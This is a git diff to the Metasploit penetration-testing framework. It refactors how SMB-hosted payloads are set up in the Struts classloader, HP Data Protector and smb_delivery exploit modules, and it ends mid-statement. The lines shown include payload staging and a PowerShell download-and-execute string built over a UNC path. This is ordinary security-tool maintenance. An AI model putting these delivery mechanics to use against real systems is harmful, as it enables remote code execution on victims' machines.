diff --git a/lib/msf/core/exploit/remote/smb/server/share.rb b/lib/msf/core/exploit/remote/smb/server/share.rb index 09b52fc528..12ed30f585 100644 --- a/lib/msf/core/exploit/remote/smb/server/share.rb +++ b/lib/msf/core/exploit/remote/smb/server/share.rb @@ -59,7 +59,8 @@ module Msf super(opts) virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(@share) - virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}") do |client, _smb_session| + # the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here + virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}".gsub(/\/|\\/, File::SEPARATOR)) do |client, _smb_session| get_file_contents(client: client) end service.add_share(virtual_disk) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 0dd4d0d2c0..fd05696dc5 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]) ]) - deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME', 'FILE_CONTENTS') + deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME') end def jsp_dropper(file, exe) @@ -217,10 +217,15 @@ class MetasploitModule < Msf::Exploit::Remote end end - # Used with SMB targets - def primer + def setup + super + self.file_name << '.jsp' self.file_contents = payload.encoded + end + + # Used with SMB targets + def primer print_status("JSP payload available on #{unc}...") print_status("Modifying Class Loader...") @@ -300,4 +305,3 @@ class MetasploitModule < Msf::Exploit::Remote modify_class_loader(properties) end end - diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb index df3ad36812..313d64f558 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb @@ -55,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote ]) deregister_options('FOLDER_NAME') - deregister_options('FILE_CONTENTS') deregister_options('SHARE') deregister_options('FILE_NAME') end @@ -95,11 +94,15 @@ class MetasploitModule < Msf::Exploit::Remote Rex::Text.to_ascii(resp).chop.chomp end - def primer - self.file_contents = generate_payload_exe - self.file_name = "installservice.exe" - self.share = "Omniback\\i386" + def setup + super + self.file_contents = generate_payload_exe + self.file_name = "i386\\installservice.exe" + self.share = "Omniback" + end + + def primer print_status("File available on #{unc}...") vprint_status("#{peer} - Trying to execute remote EXE...") diff --git a/modules/exploits/windows/smb/smb_delivery.rb b/modules/exploits/windows/smb/smb_delivery.rb index 6a934772b7..f35dbb1c70 100644 --- a/modules/exploits/windows/smb/smb_delivery.rb +++ b/modules/exploits/windows/smb/smb_delivery.rb @@ -53,8 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote [ OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll']) ]) - - deregister_options('FILE_CONTENTS') end def primer @@ -66,7 +64,6 @@ class MetasploitModule < Msf::Exploit::Remote remove_comspec: true, wrap_double_quotes: true) - ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( noprofile: true,